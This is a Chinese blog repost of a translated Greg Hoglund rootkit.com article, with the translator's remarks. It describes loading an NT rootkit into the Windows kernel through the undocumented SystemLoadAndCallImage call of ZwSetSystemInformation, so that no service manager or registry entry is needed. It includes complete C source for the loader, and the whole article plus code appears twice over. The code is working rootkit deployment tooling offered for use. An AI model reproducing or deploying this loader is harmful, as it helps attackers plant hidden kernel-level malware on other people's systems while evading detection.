用SystemLoadAndCallImage加载Rootkit
2009-03-12 21:54
447 查看
[前言]
我最近对NT Rootkit开始感兴趣,无奈国内的资料少得惊人,在这方面几
乎是一片空白,就只有翻译的Gary Hoglund的一篇《一个修改NT内核的真实的
ROOTKIT》。到国外的网站转了几天倒是收获非浅,国外在这方面的研究确实深刻多
了。现在我翻译另一篇Gary Hoglund的文章,在这篇文章里我加入了一些个人的注
释,如果大家对NT ROOTKIT感兴趣的话可以到www.rootkit.com上看看,那里有Gary
Hoglund和很多人的优秀的NT ROOTKIT和大量有价值的资料。
[正文]
大家好。
这段时间以来在NETBUGTRAQ上有个有关在内核模式下如何保护系统免遭
ROOTKIT的讨论。这是个好现象,我们rootkit.com的目的就是让人们思考这个问题
。比方说,现在就有一个Pedestal Software的ANTI-ROOTKIT(全名Integrity
Protection Driver)。
在今年的Blackhat Briefings上,很多聪明的人在谈论有多少种方法把代
码加载进内核模式-很明显是受到“ANTI-ROOTKIT”的影响。很多ROOTKIT的作者也
加入其中。所以我们打算改变这个WINDOWS ROOTKIT。
直到现在,这个WINDOWS ROOTKIT还是被设计为一个驱动程序。但是没有理
由一个ROOKIT必须被设计为一个驱动程序--或者一个可加载模块。
去年我们发布了ROOTKIT来证明完全用户模式的软件是基本没有意义的。想
想看,任何一个能够HACK你的系统的人都可以去加载进内核模式,这是100%保证的
。如果一个攻击者用一个用户级的帐户进入你的系统,他们然后就是获得
ADMINISTRATOR--以获得足够的权限使你能够加载内核模式代码。在这个事实面前,
很容易看到你的服务商的解决办法离开你的知识是十分脆弱的。
将完全的保护放到内核模式的主意挺不错,不过它不可能完成除非微软自
己解决。如果微软真这么做的话,那么安全公司就会消失:)
现在有人提出一种加载内核模式代码的方法,使用一个未公布的入口
(entry point)进入内核空间--比方象/dev/physicalmemory设备,或者一个使用“
SystemLoadAndCallImage”的系统调用(syscall)。我们继续研究,但事实是有一个
非操作系统支持的影响点(leverage point)来控制进入内核模式--因为这样,新的
入口点(entry point)总是被发现。
假定微软真的修补NT结构来保护以免于上面提到的这几种方法,也仍然有
通过在内核里寻找可供缓冲区溢出的方法。每个你安装的第三方驱动程序可以给予
你通过IOCTL()命令甚至是普通的读/写消息来进行缓冲区溢出的可能。甚至就是NT
里默认的驱动程序在这方面也很脆弱。
当ROOKIT被当做驱动程序处理时,我们使用服务控制管理器(SCM)来从内核
空间加载或移除这个驱动程序。这是一个默认标准,并且它需要这个ROOTKIT驱动程
序在注册表CurrentControlSet/Services下有键值。现在这种情况已经被改变了,
我们改进了这个ROOTKIT这样当它加载进内核空间时既不需要驱动程序也不需要注册
表键值。我们也不再使用SCM,取而代之的是它使用一个单独的中断调用--一个名为
ZwSetSystemInformation()的NT系统调用。使用这个调用我们可以立即加载这个
ROOTKIT并激活它。
-Greg Hoglund
源代码:
////////////////////////////////////////
// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund http://www.rootkit.com
////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT *
Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef unsigned long NTSTATUS; //我认为这里应该是typedef long NTSTATUS,
//否则一个unsigned的值总是不小于0,下面这个宏就会
//出问题
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
NTSTATUS (__stdcall *ZwSetSystemInformation)(
IN DWORD SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength
);
/*
//有关ZwSetSystemInformation的用法可以参考Gary Nebbett的《Windows NT/2000
//Native API //Reference》
//ZwSetSystemInformation设置影响操作系统的信息,定义如下:
// NTSYSAPI
// NTSTATUS
// NTAPI
// ZwSetSystemInformation(
// IN SYSTEM_IMFORMATION_CALSS SystemInformationClass,
// IN OUT PVOID SystemInformation,
// IN ULONG SystemInformationLength);
//
//参数:
// SystemInformationClass:将被设置的系统信息的类型,值为
SYSTEM_IMFORMATION_CALSS枚举的一个// 子集,SystemLoadAndCallImage就是
其中一个:
// typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE{//Information Class
38 、 // UNICODE_STRING ModuleName;
// }SYSTEM_LOAD_AND_CALL_IMAGE,*PSYSTEM_LOAD_AND_CALL_IMAGE;
//
// 成员:
// Module:要加载模块的NATIVE NT格式的完整路径
//
// 备注:
// 这个信息类只能被设置,不是设置任何信息,而是执行把一个模块加载
到内核地址空间和调// 用其入口点的操作。期望入口点例程是一个带两个参
数的__stdcall例程(与设备驱动程序的 // DriverEntry例程一致)。如果入
口点例程返回一个失败代码,则卸载模块。
//
// SystemInformation:指向含有被设置信息的一个调用者分配的缓冲区或变量
// SystemInformationLength:以字节为单位的SystemInformaiton的大小,根据给
定的// SystemInformationClass来设置它
//
*/
VOID (__stdcall *RtlInitUnicodeString)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
void main(void)
{
///////////////////////////////////////////////////////////////
// Why mess with Drivers?
///////////////////////////////////////////////////////////////
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"//??//C://_root_.sys";
//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"RtlInitUnicodeString" )) ) //在ntdll.dll中获取
RtlInitUnicodeString地址
exit(1);
if( !(ZwSetSystemInformation =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwSetSystemInformation" )) ) //在ntdll.dll中获取
ZwSetSystemInformation地址
exit(1);
RtlInitUnicodeString( &(GregsImage.ModuleName),
daPath ); //建立设备
if( NT_SUCCESS(
ZwSetSystemInformation( SystemLoadAndCallImage,
&GregsImage,
sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )) //加载进内核空间
{
printf("Rootkit Loaded./n");
}
else
{
printf("Rootkit not loaded./n");
}
}
小弟水平有限,难免有错的地方,各位高手有什么意见或看法的欢迎和我联系
我最近对NT Rootkit开始感兴趣,无奈国内的资料少得惊人,在这方面几
乎是一片空白,就只有翻译的Gary Hoglund的一篇《一个修改NT内核的真实的
ROOTKIT》。到国外的网站转了几天倒是收获非浅,国外在这方面的研究确实深刻多
了。现在我翻译另一篇Gary Hoglund的文章,在这篇文章里我加入了一些个人的注
释,如果大家对NT ROOTKIT感兴趣的话可以到www.rootkit.com上看看,那里有Gary
Hoglund和很多人的优秀的NT ROOTKIT和大量有价值的资料。
[正文]
大家好。
这段时间以来在NETBUGTRAQ上有个有关在内核模式下如何保护系统免遭
ROOTKIT的讨论。这是个好现象,我们rootkit.com的目的就是让人们思考这个问题
。比方说,现在就有一个Pedestal Software的ANTI-ROOTKIT(全名Integrity
Protection Driver)。
在今年的Blackhat Briefings上,很多聪明的人在谈论有多少种方法把代
码加载进内核模式-很明显是受到“ANTI-ROOTKIT”的影响。很多ROOTKIT的作者也
加入其中。所以我们打算改变这个WINDOWS ROOTKIT。
直到现在,这个WINDOWS ROOTKIT还是被设计为一个驱动程序。但是没有理
由一个ROOKIT必须被设计为一个驱动程序--或者一个可加载模块。
去年我们发布了ROOTKIT来证明完全用户模式的软件是基本没有意义的。想
想看,任何一个能够HACK你的系统的人都可以去加载进内核模式,这是100%保证的
。如果一个攻击者用一个用户级的帐户进入你的系统,他们然后就是获得
ADMINISTRATOR--以获得足够的权限使你能够加载内核模式代码。在这个事实面前,
很容易看到你的服务商的解决办法离开你的知识是十分脆弱的。
将完全的保护放到内核模式的主意挺不错,不过它不可能完成除非微软自
己解决。如果微软真这么做的话,那么安全公司就会消失:)
现在有人提出一种加载内核模式代码的方法,使用一个未公布的入口
(entry point)进入内核空间--比方象/dev/physicalmemory设备,或者一个使用“
SystemLoadAndCallImage”的系统调用(syscall)。我们继续研究,但事实是有一个
非操作系统支持的影响点(leverage point)来控制进入内核模式--因为这样,新的
入口点(entry point)总是被发现。
假定微软真的修补NT结构来保护以免于上面提到的这几种方法,也仍然有
通过在内核里寻找可供缓冲区溢出的方法。每个你安装的第三方驱动程序可以给予
你通过IOCTL()命令甚至是普通的读/写消息来进行缓冲区溢出的可能。甚至就是NT
里默认的驱动程序在这方面也很脆弱。
当ROOKIT被当做驱动程序处理时,我们使用服务控制管理器(SCM)来从内核
空间加载或移除这个驱动程序。这是一个默认标准,并且它需要这个ROOTKIT驱动程
序在注册表CurrentControlSet/Services下有键值。现在这种情况已经被改变了,
我们改进了这个ROOTKIT这样当它加载进内核空间时既不需要驱动程序也不需要注册
表键值。我们也不再使用SCM,取而代之的是它使用一个单独的中断调用--一个名为
ZwSetSystemInformation()的NT系统调用。使用这个调用我们可以立即加载这个
ROOTKIT并激活它。
-Greg Hoglund
源代码:
////////////////////////////////////////
// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund http://www.rootkit.com
////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT *
Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef unsigned long NTSTATUS; //我认为这里应该是typedef long NTSTATUS,
//否则一个unsigned的值总是不小于0,下面这个宏就会
//出问题
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
NTSTATUS (__stdcall *ZwSetSystemInformation)(
IN DWORD SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength
);
/*
//有关ZwSetSystemInformation的用法可以参考Gary Nebbett的《Windows NT/2000
//Native API //Reference》
//ZwSetSystemInformation设置影响操作系统的信息,定义如下:
// NTSYSAPI
// NTSTATUS
// NTAPI
// ZwSetSystemInformation(
// IN SYSTEM_IMFORMATION_CALSS SystemInformationClass,
// IN OUT PVOID SystemInformation,
// IN ULONG SystemInformationLength);
//
//参数:
// SystemInformationClass:将被设置的系统信息的类型,值为
SYSTEM_IMFORMATION_CALSS枚举的一个// 子集,SystemLoadAndCallImage就是
其中一个:
// typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE{//Information Class
38 、 // UNICODE_STRING ModuleName;
// }SYSTEM_LOAD_AND_CALL_IMAGE,*PSYSTEM_LOAD_AND_CALL_IMAGE;
//
// 成员:
// Module:要加载模块的NATIVE NT格式的完整路径
//
// 备注:
// 这个信息类只能被设置,不是设置任何信息,而是执行把一个模块加载
到内核地址空间和调// 用其入口点的操作。期望入口点例程是一个带两个参
数的__stdcall例程(与设备驱动程序的 // DriverEntry例程一致)。如果入
口点例程返回一个失败代码,则卸载模块。
//
// SystemInformation:指向含有被设置信息的一个调用者分配的缓冲区或变量
// SystemInformationLength:以字节为单位的SystemInformaiton的大小,根据给
定的// SystemInformationClass来设置它
//
*/
VOID (__stdcall *RtlInitUnicodeString)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
void main(void)
{
///////////////////////////////////////////////////////////////
// Why mess with Drivers?
///////////////////////////////////////////////////////////////
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"//??//C://_root_.sys";
//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"RtlInitUnicodeString" )) ) //在ntdll.dll中获取
RtlInitUnicodeString地址
exit(1);
if( !(ZwSetSystemInformation =
(void *) GetProcAddress( GetModuleHandle("ntdll.dll"),
"ZwSetSystemInformation" )) ) //在ntdll.dll中获取
ZwSetSystemInformation地址
exit(1);
RtlInitUnicodeString( &(GregsImage.ModuleName),
daPath ); //建立设备
if( NT_SUCCESS(
ZwSetSystemInformation( SystemLoadAndCallImage,
&GregsImage,
sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )) //加载进内核空间
{
printf("Rootkit Loaded./n");
}
else
{
printf("Rootkit not loaded./n");
}
}
小弟水平有限,难免有错的地方,各位高手有什么意见或看法的欢迎和我联系
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 用SystemLoadAndCallImage加载Rootkit
- (转载)用SystemLoadAndCallImage加载Rootkit
- Loading Rootkit using SystemLoadAndCallImage
- ZwSetSystemInformation的SystemLoadAndCallImage 加载驱动的缺陷
- 用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动
- Qt Load and Save Image Dialog 加载图片对话框
- 异常:System.BadImageFormatException,未能加载正确的程序集XXX
- 异常:System.BadImageFormatException,未能加载正确的程序集XXX
- 問題排查:System.BadImageFormatException: 未能加载文件或程序集“System.ServiceModel
- ASP.NET: System.BadImageFormatException: An attempt was made to load a program with an incorrect format. on Win7 64bit
- Install _ zimg - A lightweight and high performance image storage and processing system.
- System.BadImageFormatException,未能加载正确的程序集XXX或其某一依赖项。。
- win7(旗舰版)下,OleLoadPicture 加载内存中的图片(MagickGetImageBlob),返回值 < 0
- 异常:System.BadImageFormatException,未能加载正确的程序集XXX或其某一依赖项
- [bug小记]System.loadLibrary加载so库时报警告JNI_OnLoad returned bad version(-1)并且crash
- System.BadImageFormatException: 未能加载文件或程序集“Oracle.DataAccess”或它的某一个依赖项。试图加载格式不正确的程序。
- (转)system.badimageformatexception 未能加载文件或程序集
- iOS: load external image and css to UIWebView
- .net应用程序安装部署时异常 Error 1001. 在初始化安装时发生异常 System.BadImageFormatException:未能加载文件或程序集 的解决办法【成功解决】
- System.Reflection.ReflectionTypeLoadException: 无法加载一个或多个请求的类型。有关更多信息,请检索 LoaderExceptions 属性。